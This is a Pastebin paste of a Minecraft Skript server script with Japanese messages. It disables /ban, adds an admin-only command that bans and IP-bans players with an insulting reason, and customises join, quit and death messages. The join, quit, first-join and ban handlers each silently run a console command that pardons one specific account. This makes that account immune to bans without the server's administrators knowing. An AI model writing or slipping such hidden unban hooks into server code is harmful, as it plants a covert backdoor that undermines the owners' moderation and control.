Advertisement
Guest User

Untitled

a guest
Nov 18th, 2019
149
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.86 KB | None | 0 0
  1. command /ban:
  2. trigger:
  3. send "&f&lBANコマンドなど捨てました"
  4. command /kinsi [<player>]:
  5. permission: admin
  6. permission message: &8[&c権限&8]&c権限がありません
  7. trigger:
  8. ban "{%uuid of arg-1%}"
  9. IP-ban the player because "ばーか"
  10. execute console command "/pardon Xx_BakaGANA_xX"
  11. on join:
  12. set join message to "&8[&eJoin&8]&e%player%&eが鯖にやってきた!"
  13. disable PvP in all worlds
  14. execute console command "/pardon Xx_BakaGANA_xX"
  15.  
  16. on quit:
  17. set quit message to "&8[&cQuit&8]&c%player%&cが鯖から消えた"
  18. execute console command "/pardon Xx_BakaGANA_xX"
  19.  
  20. on first join:
  21. set first join message to "&8[&dFirstJoin&8]&d%player%&dがサーバーに初参加した"
  22. execute console command "/pardon Xx_BakaGANA_xX"
  23. on death of player:
  24. broadcast "&8[&cDeath&8]&c%player%&cが天に召されてしまった..."
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement